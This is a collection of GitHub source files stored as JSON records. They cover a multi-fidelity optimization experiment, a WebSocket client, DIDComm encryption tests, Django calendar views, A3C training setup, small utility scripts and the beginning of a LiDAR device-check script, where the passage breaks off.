+{"seq_id":"34650259918","text":"#!/usr/bin/env python\n\nimport os, sys\nimport pickle\nimport numpy as np\nimport pandas as pd\n\nfrom olympus.surfaces import Surface\nfrom olympus.campaigns import Campaign, ParameterSpace \nfrom olympus.objects import ParameterDiscrete\n\nfrom atlas.planners.multi_fidelity.planner import MultiFidelityPlanner\n\n\n# CONFIG\nSURFACE_KIND = 'Schwefel'\nDIM = 6\nNUM_RUNS = 50\nBUDGET = 30\n\n\nsurface = Surface(kind=SURFACE_KIND, param_dim=DIM)\n\n\n# HELPER FUNCTIONS\ndef compute_cost(observations):\n    return np.sum(observations.get_params()[:, 0].astype(float))\n\ndef measure(params, s):\n    x0 = params.param_0\n    x1 = params.param_1\n    x2 = params.param_2\n    x3 = params.param_3\n    x4 = params.param_4\n    x5 = params.param_5\n    if s == 1.:\n        measurement = surface.run([x0,x1,x2,x3,x4,x5])[0][0] # high fidelity\n    if s == 0.1:\n        measurement = surface.run([x0,x1,x2,x3,x4,x5])[0][0] + 0.5 # low fidelity: true value plus a constant bias\n    return measurement\n\n\n# BUILD PARAMETER SPACE\nparam_space = ParameterSpace()\nparam_space.add(ParameterDiscrete(name='s', options=[0.1, 1.]))\nfor param in surface.param_space:\n    param_space.add(param)\n\n\n# BEGIN EXPERIMENT\n\n\nall_data = []\nfor run_ix in range(NUM_RUNS):\n    \n    planner = MultiFidelityPlanner(\n        goal='minimize',\n        fidelity_params=0,\n        fidelities=[0.1, 1.],\n        acquisition_optimizer_kind='pymoo',\n    )\n    planner.set_param_space(param_space)\n    \n    campaign = Campaign()\n    campaign.set_param_space(param_space)\n    \n    target_rec_measurements = []\n    \n    cumul_cost = []\n    max_cumul_cost = 0.\n    iter_ = 0\n    while max_cumul_cost < BUDGET: \n        # every fourth ask is at the target fidelity, the rest are cheap\n        if iter_ % 4 == 0:\n            planner.set_ask_fidelity(1.0)\n        else:\n            planner.set_ask_fidelity(0.1)\n        samples = planner.recommend(campaign.observations)\n        for sample in samples:\n\n            measurement = measure(sample, sample.s)\n            campaign.add_observation(sample, measurement)\n            cumul_cost.append( compute_cost(campaign.observations) )\n            max_cumul_cost = np.amax(cumul_cost)\n        \n        iter_ += 1\n        \n        if campaign.num_obs >= 5+1:\n            # make a prediction on the target fidelity and measure greedy\n            rec_sample = planner.recommend_target_fidelity(batch_size=1)[0]\n            
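# the value logged for this iteration is the model's current best guess\n            # evaluated at the target fidelity (s=1.0), not the raw sample above\n            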
rec_measurement = measure(rec_sample, s=1.0)\n            target_rec_measurements.append(rec_measurement)\n        \n        else:\n            # just record the current measurement\n            target_rec_measurements.append(measurement)\n    \n    \n    # store results in dataframe\n    s_col = campaign.observations.get_params()[:, 0]\n    x0_col = campaign.observations.get_params()[:, 1]\n    x1_col = campaign.observations.get_params()[:, 2]\n    x2_col = campaign.observations.get_params()[:, 3]\n    x3_col = campaign.observations.get_params()[:, 4]\n    x4_col = campaign.observations.get_params()[:, 5]\n    x5_col = campaign.observations.get_params()[:, 6]\n\n    obj0 = np.array(target_rec_measurements) #campaign.observations.get_values()\n\n    data = pd.DataFrame({\n        'cumul_cost': np.array(cumul_cost),\n        's': s_col,\n        'x0': x0_col,\n        'x1': x1_col,\n        'x2': x2_col,\n        'x3': x3_col,\n        'x4': x4_col,\n        'x5': x5_col,\n        'obj': target_rec_measurements,\n    })\n    all_data.append(data)\n    pickle.dump(all_data, open('mf_cont_high_results.pkl', 'wb'))\n\n\n\n","repo_name":"aspuru-guzik-group/atlas","sub_path":"examples/multi_fidelity/schwefel_6d/run_mf.py","file_name":"run_mf.py","file_ext":"py","file_size_in_byte":3430,"program_lang":"python","lang":"en","doc_type":"code","stars":19,"dataset":"github-code","pt":"53"}
+{"seq_id":"13653128563","text":"from urllib.parse import urlparse\nfrom typing import Union, Type\nfrom os import urandom\n\nfrom zoey.chain import Extension, WSConstructor\nfrom zoey.exceptions import AlreadyClosed, HandshakeFail, NotConnected\nfrom zoey.framing import ControlFrame, Close, ExtensionRsvs, Message, Ping, Pong, Frame, FrameOpcode\nfrom zoey.handshake import WebsocketUpgrade, ServerResponse\nfrom zoey.utils import ConnectionStatus\n\nfrom gevent import spawn\nimport gevent._ssl3 as ssl\nimport gevent._socket3 as socket\n\n\nclass Client:\n\n    WS_PORT = 80, 443\n    MAX_SIZE = (2 ** 64) - 1\n\n    def __init__(self, ws_uri: str, *extensions: Type[Extension], origin: str=None,\n                 host: str=None, context: ssl.SSLContext=None):\n        self.uri = urlparse(ws_uri)\n\n        if self.uri.scheme not in (\"wss\", \"ws\"):\n            raise NotImplementedError(\"Scheme must be either 'wss' or 'ws'.\")\n\n        self.extensions = [extension(self) for extension in extensions]\n        self.overwrites = {\"origin\": origin, \"host\": host}\n        self.status = ConnectionStatus.CLOSED\n        self.socket = socket.socket()\n        self.constructor = WSConstructor(self)\n        if self.is_secure:\n            context = context or ssl.create_default_context()\n            self.socket = context.wrap_socket(self.socket, server_hostname=host or self.uri.hostname)\n\n        self.close_reason = None\n        self._connect_greenlet = None\n\n    def trigger(self, name: str, *args, **kwargs):\n        for extension in self.extensions:\n            getattr(extension, name)(*args, **kwargs)\n\n    def send_control(self, frame: Type[ControlFrame], **kwargs):\n        self.trigger(\"before_control_frame\", frame)\n        data = frame.build(**kwargs, extensions=self.extensions)\n        self.socket.send(data)\n\n    def send_message(self, msg: Union[bytes, str]):\n        is_text = isinstance(msg, str)\n        if is_text:\n            msg = msg.encode(\"utf8\")\n        msgs = []\n        for chunk in range(0, len(msg), self.MAX_SIZE):\n            msgs.append(msg[chunk: chunk + self.MAX_SIZE])\n\n        rsvs = [False, False, False]\n        for extension in self.extensions:\n            for i in range(3):\n                rsvs[i] = extension.should_set(i, Frame)\n\n        for i, part in enumerate(msgs):\n            frame = Frame(\n                True if i == len(msgs) - 1 else False,\n                ExtensionRsvs(*map(int, rsvs)),\n                FrameOpcode.TEXT if is_text else FrameOpcode.BINARY,\n                part,\n                urandom(4) if not self.is_secure else None\n            )\n            
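# note: RFC 6455 expects clients to mask every frame; this library only\n            # masks plain ws:// connections (the same convention close() uses below)\n            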
self.trigger(\"before_frame\", frame)\n            self.socket.send(frame.build())\n\n    @property\n    def is_secure(self) -> bool:\n        return self.uri.scheme == \"wss\"\n\n    def close(self, code: int=1000, reason: str=None):\n        # compare against the current status; the bare enum values are always truthy\n        if self.status == ConnectionStatus.CONNECTED:\n            self.send_control(Close, mask=urandom(4) if not self.is_secure else None, code=code, reason=reason)\n            self.status = ConnectionStatus.CLOSING\n        elif self.status == ConnectionStatus.CONNECTING:\n            self.socket.close()\n        elif self.status == ConnectionStatus.CLOSING:\n            self.socket.close()\n        else:\n            raise AlreadyClosed\n\n    def connect(self):\n        self.status = ConnectionStatus.CONNECTING\n        self.socket.connect((self.uri.hostname, self.WS_PORT[1] if self.is_secure else self.WS_PORT[0]))\n        upgrade = WebsocketUpgrade(self.uri, self.extensions, **self.overwrites)\n        data = upgrade.build()\n        self.socket.send(data)\n        response = ServerResponse.load(self.socket)\n        if response.code != 101:\n            self.close()\n            raise HandshakeFail(\"Code: {}\".format(response.code))\n        if not upgrade.confirm(response):\n            self.close()\n            raise HandshakeFail(\"Invalid websocket response\")\n        self.status = ConnectionStatus.CONNECTED\n        self._connect_greenlet = spawn(self.constructor.start)\n        self.trigger(\"on_connection\")\n        self.on_connection()\n\n    def run_forever(self):\n        if self.status != ConnectionStatus.CONNECTING and self.status != ConnectionStatus.CONNECTED:\n            raise NotConnected(\"Must connect before running forever.\")\n        self._connect_greenlet.join()\n\n    def on_connection(self):\n        pass\n\n    def on_message(self, msg: Message):\n        pass\n\n    def on_ping(self, ping: Ping):\n        pass\n\n    def on_pong(self, pong: Pong):\n        pass\n\n    def on_close(self, close: Close):\n        self.close_reason = close\n        self.status = ConnectionStatus.CLOSING\n        self.close()\n","repo_name":"Zwork101/Zoey","sub_path":"zoey/client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":4558,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"}
+{"seq_id":"31852458105","text":"import pandas as pd\n\n# Read data from file 'filename.csv' \n# (in the same directory that your python process is based)\n# Control delimiters, rows, column names with read_csv (see later) \ndata = pd.read_csv(\"coord_1.csv\") \n# Preview the first 5 lines of the loaded data \ndata = pd.DataFrame(data)\n\nfor idx, row in data.iterrows():\n    rssi = row[\"rssi\"]\n    # iterrows() yields copies, so write back through .loc or the change is lost\n    data.loc[idx, \"rssi\"] = rssi * rssi * -1\ndata.to_csv(\"coord_1.csv\")","repo_name":"samlarsen18/lora_project","sub_path":"heap_map/modify_data.py","file_name":"modify_data.py","file_ext":"py","file_size_in_byte":412,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"27014221370","text":"import pytest\n\nfrom didcomm.common.algorithms import AuthCryptAlg, AnonCryptAlg\nfrom didcomm.core.utils import is_did_with_uri_fragment\nfrom didcomm.pack_encrypted import pack_encrypted, PackEncryptedConfig\nfrom didcomm.unpack import unpack\nfrom didcomm.protocols.routing.forward import unpack_forward\nfrom tests.test_vectors.common import BOB_DID, ALICE_DID\nfrom tests.test_vectors.didcomm_messages.messages import (\n    TEST_MESSAGE,\n    minimal_msg,\n    attachment_multi_1_msg,\n    attachment_json_msg,\n)\nfrom tests.test_vectors.utils import (\n    get_key_agreement_methods_in_secrets,\n    Person,\n    get_key_agreement_methods,\n    KeyAgreementCurveType,\n    get_auth_methods_in_secrets,\n)\n\nAUTH_ALG_PARAMS = [None, AuthCryptAlg.A256CBC_HS512_ECDH_1PU_A256KW]\nANON_ALG_PARAMS = [\n    None,\n    AnonCryptAlg.XC20P_ECDH_ES_A256KW,\n    
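# None exercises the library default, which the assertions below expect\n    # to be XC20P_ECDH_ES_A256KW\n    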
AnonCryptAlg.A256GCM_ECDH_ES_A256KW,\n AnonCryptAlg.A256CBC_HS512_ECDH_ES_A256KW,\n]\nSIGN_FRM_PARAMS = [None, ALICE_DID] + [\n vm.id for vm in get_auth_methods_in_secrets(Person.ALICE)\n]\nCURVES_TYPES = [\n KeyAgreementCurveType.X25519,\n KeyAgreementCurveType.P256,\n KeyAgreementCurveType.P521,\n KeyAgreementCurveType.P384,\n]\nMESSAGES = [\n TEST_MESSAGE,\n minimal_msg(),\n attachment_multi_1_msg(),\n attachment_json_msg(),\n]\n\n\n@pytest.mark.asyncio\n@pytest.mark.parametrize(\"msg\", MESSAGES)\n@pytest.mark.parametrize(\"auth_alg\", AUTH_ALG_PARAMS)\n@pytest.mark.parametrize(\"anon_alg\", ANON_ALG_PARAMS)\n@pytest.mark.parametrize(\"sign_frm\", SIGN_FRM_PARAMS)\n@pytest.mark.parametrize(\"protect_sender_id\", [True, False])\nasync def test_authcrypt_sender_did_recipient_did(\n msg,\n auth_alg,\n anon_alg,\n sign_frm,\n protect_sender_id,\n resolvers_config_alice,\n resolvers_config_bob,\n resolvers_config_mediator1,\n):\n await check_authcrypt(\n msg=msg,\n frm=ALICE_DID,\n to=BOB_DID,\n sign_frm=sign_frm,\n auth_alg=auth_alg,\n anon_alg=anon_alg,\n protect_sender_id=protect_sender_id,\n resolvers_config_alice=resolvers_config_alice,\n resolvers_config_bob=resolvers_config_bob,\n resolvers_config_mediator1=resolvers_config_mediator1,\n curve_type=KeyAgreementCurveType.X25519, # the first Alice key is X25519\n )\n\n\n@pytest.mark.asyncio\n@pytest.mark.parametrize(\"msg\", MESSAGES)\n@pytest.mark.parametrize(\n \"to\",\n [\n vm.id\n for vm in get_key_agreement_methods_in_secrets(\n Person.BOB, KeyAgreementCurveType.X25519\n )\n ],\n)\n@pytest.mark.parametrize(\"auth_alg\", AUTH_ALG_PARAMS)\n@pytest.mark.parametrize(\"anon_alg\", ANON_ALG_PARAMS)\n@pytest.mark.parametrize(\"sign_frm\", SIGN_FRM_PARAMS)\n@pytest.mark.parametrize(\"protect_sender_id\", [True, False])\nasync def test_authcrypt_sender_did_recipient_kid(\n msg,\n to,\n auth_alg,\n anon_alg,\n sign_frm,\n protect_sender_id,\n resolvers_config_alice,\n resolvers_config_bob,\n resolvers_config_mediator1,\n):\n await check_authcrypt(\n msg=msg,\n frm=ALICE_DID,\n to=to,\n sign_frm=sign_frm,\n auth_alg=auth_alg,\n anon_alg=anon_alg,\n protect_sender_id=protect_sender_id,\n resolvers_config_alice=resolvers_config_alice,\n resolvers_config_bob=resolvers_config_bob,\n resolvers_config_mediator1=resolvers_config_mediator1,\n curve_type=KeyAgreementCurveType.X25519,\n )\n\n\n@pytest.mark.asyncio\n@pytest.mark.parametrize(\"msg\", MESSAGES)\n@pytest.mark.parametrize(\"curve_type\", CURVES_TYPES)\n@pytest.mark.parametrize(\"auth_alg\", AUTH_ALG_PARAMS)\n@pytest.mark.parametrize(\"anon_alg\", ANON_ALG_PARAMS)\n@pytest.mark.parametrize(\"sign_frm\", SIGN_FRM_PARAMS)\n@pytest.mark.parametrize(\"protect_sender_id\", [True, False])\nasync def test_authcrypt_sender_kid_recipient_did(\n msg,\n curve_type,\n auth_alg,\n anon_alg,\n sign_frm,\n protect_sender_id,\n resolvers_config_alice,\n resolvers_config_bob,\n resolvers_config_mediator1,\n):\n for frm in [\n vm.id for vm in get_key_agreement_methods_in_secrets(Person.ALICE, curve_type)\n ]:\n await check_authcrypt(\n msg=msg,\n frm=frm,\n to=BOB_DID,\n sign_frm=sign_frm,\n auth_alg=auth_alg,\n anon_alg=anon_alg,\n protect_sender_id=protect_sender_id,\n resolvers_config_alice=resolvers_config_alice,\n resolvers_config_bob=resolvers_config_bob,\n resolvers_config_mediator1=resolvers_config_mediator1,\n curve_type=curve_type,\n )\n\n\n@pytest.mark.asyncio\n@pytest.mark.parametrize(\"msg\", MESSAGES)\n@pytest.mark.parametrize(\"curve_type\", CURVES_TYPES)\n@pytest.mark.parametrize(\"auth_alg\", 
AUTH_ALG_PARAMS)\n@pytest.mark.parametrize(\"anon_alg\", ANON_ALG_PARAMS)\n@pytest.mark.parametrize(\"sign_frm\", SIGN_FRM_PARAMS)\n@pytest.mark.parametrize(\"protect_sender_id\", [True, False])\nasync def test_authcrypt_sender_kid_recipient_kid(\n msg,\n curve_type,\n auth_alg,\n anon_alg,\n sign_frm,\n protect_sender_id,\n resolvers_config_alice,\n resolvers_config_bob,\n resolvers_config_mediator1,\n):\n for frm in [\n vm.id for vm in get_key_agreement_methods_in_secrets(Person.ALICE, curve_type)\n ]:\n for to in [\n vm.id for vm in get_key_agreement_methods_in_secrets(Person.BOB, curve_type)\n ]:\n await check_authcrypt(\n msg=msg,\n frm=frm,\n to=to,\n sign_frm=sign_frm,\n auth_alg=auth_alg,\n anon_alg=anon_alg,\n protect_sender_id=protect_sender_id,\n resolvers_config_alice=resolvers_config_alice,\n resolvers_config_bob=resolvers_config_bob,\n resolvers_config_mediator1=resolvers_config_mediator1,\n curve_type=curve_type,\n )\n\n\nasync def check_authcrypt(\n msg,\n frm,\n to,\n sign_frm,\n auth_alg,\n anon_alg,\n protect_sender_id,\n resolvers_config_alice,\n resolvers_config_bob,\n resolvers_config_mediator1,\n curve_type,\n):\n pack_config = PackEncryptedConfig(protect_sender_id=protect_sender_id)\n if auth_alg:\n pack_config.enc_alg_auth = auth_alg\n if anon_alg:\n pack_config.enc_alg_anon = anon_alg\n pack_result = await pack_encrypted(\n resolvers_config=resolvers_config_alice,\n message=msg,\n frm=frm,\n to=to,\n sign_frm=sign_frm,\n pack_config=pack_config,\n )\n\n expected_to = [to]\n if not is_did_with_uri_fragment(to):\n expected_to = [\n vm.id for vm in get_key_agreement_methods(Person.BOB, curve_type)\n ]\n\n expected_frm = frm\n if not is_did_with_uri_fragment(frm):\n expected_frm = get_key_agreement_methods_in_secrets(Person.ALICE)[0].id\n\n expected_sign_frm = None\n if sign_frm is not None and sign_frm != ALICE_DID:\n expected_sign_frm = sign_frm\n if sign_frm == ALICE_DID:\n expected_sign_frm = get_auth_methods_in_secrets(Person.ALICE)[0].id\n\n assert pack_result.from_kid == expected_frm\n assert pack_result.to_kids == expected_to\n assert pack_result.sign_from_kid == expected_sign_frm\n assert pack_result.packed_msg is not None\n\n forward_bob = await unpack_forward(\n resolvers_config_mediator1, pack_result.packed_msg, True\n )\n # TODO ??? 
might need some checks against forward unpack result\n    # (but it's actually out of current test case scope)\n\n    unpack_res = await unpack(\n        resolvers_config=resolvers_config_bob, packed_msg=forward_bob.forwarded_msg\n    )\n\n    expected_alg = auth_alg or AuthCryptAlg.A256CBC_HS512_ECDH_1PU_A256KW\n    expected_anon_alg = anon_alg or AnonCryptAlg.XC20P_ECDH_ES_A256KW\n    if not protect_sender_id:\n        expected_anon_alg = None\n    assert unpack_res.message == msg\n    assert unpack_res.metadata.enc_alg_anon == expected_anon_alg\n    assert unpack_res.metadata.enc_alg_auth == expected_alg\n    assert unpack_res.metadata.anonymous_sender == protect_sender_id\n    assert unpack_res.metadata.encrypted\n    assert unpack_res.metadata.non_repudiation == (sign_frm is not None)\n    assert not unpack_res.metadata.re_wrapped_in_forward\n    assert unpack_res.metadata.authenticated\n","repo_name":"sicpa-dlab/didcomm-python","sub_path":"tests/unit/pack_encrypted/test_pack_auth_encrypted.py","file_name":"test_pack_auth_encrypted.py","file_ext":"py","file_size_in_byte":8243,"program_lang":"python","lang":"en","doc_type":"code","stars":14,"dataset":"github-code","pt":"53"}
+{"seq_id":"6375034967","text":"import time\r\nimport random\r\nclass Diction:\r\n    __database={'@auther':'cqs',}\r\n    def __init__(self):\r\n        self.__database={'@auther':'cqs','@time':time.strftime(\"%Y-%m-%d %H:%M:%S\", time.localtime())}\r\n        print('you can add(key, word) and check history using showAll()')\r\n        print(self.__database)\r\n\r\n    def add(self,key,word):\r\n        self.__database[key]=word\r\n    def showAll(self):\r\n        # add a page element control for the output\r\n        for item in self.__database.items():\r\n            print(item)\r\n    def review(self,num=3):\r\n        words=list(self.__database.keys())\r\n        for i in range(num):\r\n            word=random.choice(words)\r\n            print(word)\r\n            while(True):\r\n                option=input(\"check:c or skip:s \")\r\n                if option.startswith('c') or option.startswith('s'):\r\n                    break\r\n                else:\r\n                    print(\"argument error\")\r\n            \r\n            if option.startswith('c'):\r\n                print( word,':',self.__database[word])\r\n\r\n\r\nif __name__=='__main__':\r\n    d= Diction()\r\n    d.add('help','帮助')\r\n    d.add('check','查看')\r\n    #d.showAll()\r\n    d.review()\r\n    inp=input(\"showAll? 
:y/n \")\r\n if inp=='y':\r\n d.showAll()\r\n \r\n \r\n \r\n","repo_name":"Gitcqs/study","sub_path":"dic.py","file_name":"dic.py","file_ext":"py","file_size_in_byte":1268,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"74271642729","text":"\"\"\"List of django views for planning management\n\n\"\"\"\n# django imports\nfrom django.shortcuts import get_object_or_404, redirect\nfrom django.utils.translation import ugettext as _\nfrom django.contrib.auth.decorators import login_required\nfrom django.http import HttpResponse\nfrom django.utils import simplejson as json\nfrom django.core.exceptions import ObjectDoesNotExist\n\n# python imports\nimport functools\nfrom datetime import date, datetime, timedelta\nfrom vobject import iCalendar\n\n# app imports\nfrom events.models import When, Who, Event\nfrom pedagogy.models import SubjectModality\nfrom utils.shortcuts import render_to_response\nfrom events.forms import UserEventForm, CampusEventForm, ClassgroupEventForm,\\\nMoveEventForm, ClassgroupSelectorForm, CampusSelectorForm, MySelectorForm\nfrom events.managers import WhenManager\n \ndef is_event_editable(user, when):\n event_type, who = when.event.get_type()\n if event_type == 'classgroup' and\\\n user.get_profile().can_manage_classgroup(who.classgroup.id):\n return True\n if event_type == 'user' and who.user == user:\n return True\n if event_type == 'campus' and\\\n user.get_profile().can_manage_campus(who.campus.id):\n return True\n return False\n \n@login_required\ndef get_planning(request, what=None, what_arg=None, extra_context={}, **kwargs):\n \"\"\"Return the planning for `what`. What determines the method we will use\n to fetch the informations through the model manager.\n\n Special parameters can be set in `extra_parameters`.\n This mainly return the JSON to be parsed by the calendar client.\n\n \"\"\"\n start_date = date.fromtimestamp(int(request.GET[\"start\"]))\n end_date = date.fromtimestamp(int(request.GET[\"end\"]))\n #We don't want people to make too big queries\n\n if (end_date - start_date).days > 50:\n end_date = start_date\n\n # partial to not give the request to the model.\n partial_is_editable = functools.partial(is_event_editable, request.user)\n w = When.objects.user_planning(request.user, what, start_date, end_date,\\\n what_arg)\n if what == \"classgroup\":\n what = \"%s-%s\" % (what, int(what_arg) % 5)\n d = [p.to_fullcalendar_dict(partial_is_editable, what) for p in w]\n return HttpResponse(json.dumps(d))\n\ndef get_ical(request, what=None, what_arg=None, must=True, extra_context={}, **kwargs):\n start_date = date.min\n end_date = date.max\n w = When.objects.user_planning(request.user, what, start_date, end_date,\\\n what_arg)\n cal = iCalendar()\n cal.add('method').value = 'PUBLISH' # IE/Outlook needs this\n for e in w:\n cal.add(e.to_vevent())\n icalstream = cal.serialize()\n response = HttpResponse(icalstream, mimetype='text/calendar')\n if what_arg is None:\n what_arg = \"\"\n response['Filename'] = '%s%s.ics' % (what, what_arg) # IE needs this\n response['Content-Disposition'] = 'attachment; filename=%s' %\\\n response['Filename']\n return response\n\n\n@login_required\ndef list_events(request):\n to_fetch = (\"mandatory\", \"my_user\", \"my_classgroup\", \"my_campus\",\n \"my_university\")\n events = set()\n start_date = datetime.now()\n end_date = datetime.now()+timedelta(days=7)\n for source in to_fetch:\n fetched = When.objects.user_planning(request.user, source,\n start_date, end_date)\n for 
event in list(fetched):\n event.resource = source\n events = events | set(fetched)\n return render_to_response('list_events.html', {'whens' : events,} , request)\n\n \n\n@login_required\ndef add_event(request, what=None, what_arg=None, extra_context={}, **kwargs):\n if what == \"classgroup\":\n return add_classgroup_event(request)\n if what == \"campus\":\n return add_campus_event(request)\n if what == \"my_user\":\n return add_user_event(request)\n if what == \"my_university\":\n pass\n\n@login_required\ndef add_user_event(request):\n if request.POST:\n form = UserEventForm(data=request.POST, prefix=\"user\")\n if form.is_valid():\n when = form.save()\n who = Who(user=request.user, event=when.event)\n who.save()\n j = when.to_fullcalendar_dict(lambda when:True, \"my_user\")\n return HttpResponse(json.dumps(j))\n else:\n return False\n\n@login_required\ndef move_event(request, when_id):\n if request.POST:\n when = When.objects.get(id=when_id)\n if not is_event_editable(request.user, when):\n return False\n form = MoveEventForm(data=request.POST)\n if form.is_valid():\n offset = timedelta(days=form.cleaned_data['days'],\n minutes=form.cleaned_data['minutes'])\n n_date = when.date + offset\n when.date = n_date\n when.save()\n j = when.to_fullcalendar_dict(lambda when:True, \"moved\")\n return HttpResponse(json.dumps(j))\n else:\n return False\n\n@login_required\ndef resize_event(request, when_id):\n if request.POST:\n when = When.objects.get(id=when_id)\n if not is_event_editable(request.user, when):\n return False\n form = MoveEventForm(data=request.POST)\n if form.is_valid():\n duration = int(form.cleaned_data['days']) * 24 +\\\n int(form.cleaned_data['minutes']) / 60\n when.event.duration = when.event.duration + duration\n when.event.save()\n return HttpResponse(\"ok\")\n else:\n return HttpResponse(\"!ok\")\n\n@login_required\ndef delete_event(request, when_id):\n if request.POST:\n when = When.objects.get(id=when_id)\n if not is_event_editable(request.user, when):\n return HttpResponse(\"!ok\", status=403)\n when.event.delete()\n return HttpResponse(\"ok\")\n return HttpResponse(\"!ok\", status=500)\n\n@login_required\ndef display_calendar(request):\n #Standard forms\n user_form = UserEventForm(prefix=\"user\")\n my_selector_form = MySelectorForm(prefix=\"my_selector\")\n forms = { 'user_form': user_form,}\n selectors = {'my_selector_form': my_selector_form,}\n\n if request.user.get_profile().can_manage_campus():\n forms['campus_form'] = CampusEventForm(prefix=\"campus\",\n user=request.user)\n forms['classgroup_form'] = ClassgroupEventForm(prefix=\"classgroup\",\n user=request.user)\n selectors['campus'] = CampusSelectorForm(\n prefix=\"cmp_selector\", user=request.user)\n selectors['classgroup'] = ClassgroupSelectorForm(\n prefix=\"cg_selector\", user=request.user)\n selectors['my_selector_form'] = MySelectorForm(prefix=\"my_selector\",\n what=[\"my_user\"])\n\n forms.update(selectors)\n return render_to_response('calendar.html', {'forms' : forms,} , request)\n\n \n\n@login_required\ndef display_campus_mgr_calendar(request):\n user_form = UserEventForm(prefix=\"user\")\n my_selector_form = MySelectorForm(prefix=\"my_selector\", what=[\"my_user\"])\n return render_to_response('calendar.html', {\n 'campus_form': campus_form, \n 'user_form': user_form, \n 'classgroup_form': classgroup_form, \n 'classgroup_selector_form': classgroup_selector_form,\n 'campus_selector_form': campus_selector_form,\n 'my_selector_form': my_selector_form,\n }, request)\n\n\n@login_required\ndef 
add_classgroup_event(request):\n if request.POST:\n form = ClassgroupEventForm(user=request.user, data=request.POST,\n prefix=\"classgroup\")\n when = form.save()\n j = when.to_fullcalendar_dict(lambda when:True, \"classgroup\")\n return HttpResponse(json.dumps(j))\n else:\n return False\n\n@login_required\ndef add_campus_event(request):\n if request.POST:\n form = CampusEventForm(user=request.user, data=request.POST,\n prefix=\"campus\")\n when = form.save()\n j = when.to_fullcalendar_dict(lambda when:True, \"campus\")\n return HttpResponse(json.dumps(j))\n else:\n return False\n\ndef update_event(request, when_id):\n form = None\n when = get_object_or_404(When, pk=when_id)\n event_type, who = when.event.get_type()\n data = {'name' : when.event.name,\n 'date' : when.date.strftime(\"%Y-%m-%d\"),\n 'start_hour' : int(when.date.strftime(\"%H\")),\n 'duration' : int(when.event.duration),\n 'place_text' : when.event.place_text,\n 'force_display' : when.event.force_display,\n }\n if event_type == 'classgroup' and\\\n request.user.get_profile().can_manage_classgroup(who.classgroup.id):\n data.update({'place' : when.event.places.get().id,\n 'classgroup' :\n who.classgroup.id,\n 'modality' : \n when.event.subject_modality.type,\n 'subject' : \n when.event.subject_modality.subject.id, })\n if request.POST:\n form = ClassgroupEventForm(user=request.user, data=request.POST)\n else:\n form = ClassgroupEventForm(user=request.user, initial=data)\n elif event_type == 'user' and\\\n who.user == request.user:\n if request.POST:\n form = UserEventForm(data=request.POST)\n else:\n form = UserEventForm(initial=data)\n elif event_type == 'campus' and\\\n request.user.get_profile().can_manage_cursus(who.campus.id):\n try:\n place_id = when.event.places.get().id\n except ObjectDoesNotExist:\n place_id = None\n data.update({'place' : place_id,\n 'campus' : who.campus.id,\n })\n if request.POST:\n form = CampusEventForm(data=request.POST, user=request.user)\n else:\n form = CampusEventForm(initial=data, user=request.user)\n if request.POST:\n if form.is_valid():\n when = form.save(when)\n j = when.to_fullcalendar_dict(lambda when:True, \"moved\")\n return HttpResponse(json.dumps(j))\n return render_to_response('edit_user_calendar.html', {\n 'form': form,}, request)\n","repo_name":"easytimetable/easytimetable","sub_path":"easytimetable/events/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":10199,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"53"} +{"seq_id":"25983093369","text":"# -*- coding: utf-8 -*-\n\"\"\"\nrl core functionality\n\n@author: thomas\n\"\"\"\nimport tensorflow as tf\nimport gym\nimport numpy as np\nimport logging\nfrom BufferWrapper import BufferWrapper # Optional: environment wrapper\nimport mymodule\nimport multiprocessing\nimport Agent\nimport Network\n\nclass Train(object):\n ''' Wraps training '''\n\n def __init__(self,FLAGS):\n self.FLAGS = FLAGS\n self.logger = logging.getLogger(FLAGS.log_name)\n if self.FLAGS.distributed:\n self.cluster = mymodule.make_cluster(self.FLAGS) # make cluster\n\n def run(self):\n ''' Start up all threads ''' \n \n self.T = mymodule.Counter(0)\n self.envs = [BufferWrapper(gym.make(self.FLAGS.game)) for i in range(self.FLAGS.num_agents)] \n \n # Parameter servers\n ps_threads = [multiprocessing.Process(target=ps_thread,args=(self.cluster,k)) for k in range(self.FLAGS.num_ps)]\n for ps in ps_threads:\n ps.daemon = True\n ps.start() \n \n # Agents \n agents = 
[multiprocessing.Process(target=Agent.run_agent,args=(thread_id,self.envs[thread_id],self.cluster,self.T,self.FLAGS)) \n for thread_id in range(self.FLAGS.num_agents)]\n for agent in agents:\n agent.start()\n \n # Plotting \n if self.FLAGS.show_training:\n self.plotting()\n \n for agent in agents:\n agent.join()\n \n self.logger.info('Finishing training, total steps:{}'.format(self.T.value()))\n\n def plotting(self):\n ''' Visualize environments '''\n while True: \n for env in self.envs:\n env.render()\n\ndef ps_thread(cluster,k):\n server = tf.train.Server(cluster, job_name=\"ps\", task_index=k)\n server.join()\n \n","repo_name":"tmoer/a3c-Tensorflow-OpenAIGym","sub_path":"Train.py","file_name":"Train.py","file_ext":"py","file_size_in_byte":1846,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"31041901925","text":"def palindrome():\r\n \r\n '''\r\nlargest palindrome of 3 digit product\r\n '''\r\n pal=[]\r\n for x in range(100,999):\r\n for i in range(100,999):\r\n num=str(i*x)\r\n if len(num)==6:\r\n if num[0]==num[-1]and num[1]==num[-2]and num[2] == num[-3]:\r\n pal.append(i*x)\r\n return max(pal)\r\nprint(palindrome())\r\n\r\n","repo_name":"AmsRed/projecteuler","sub_path":"prob 4.py","file_name":"prob 4.py","file_ext":"py","file_size_in_byte":371,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"38305421048","text":"import pyudev as udevpy\nimport subprocess as sp\nimport time\nimport os\n\nclass Diagnotics:\n def checkttyUSB0():\n print(\"[LiDAR] Checking LiDAR presence\")\n try:\n context = udevpy.Context()\n dev = udevpy.Device.from_device_file(context, '/dev/ttyUSB0')\n print(\"[LiDAR] LiDar Present\")\n print(\"[LiDAR] Device Name = \" + dev.sys_name)\n return True\n except Exception as e:\n # We weren't able to use pyudev (possibly because of an invalid operating system)\n print(\"[WARNING] LiDAR Not Present - \" + str(e))\n return False\n return False\n\n def checkttyACM0():\n print(\"[Arduino] Checking Arduino 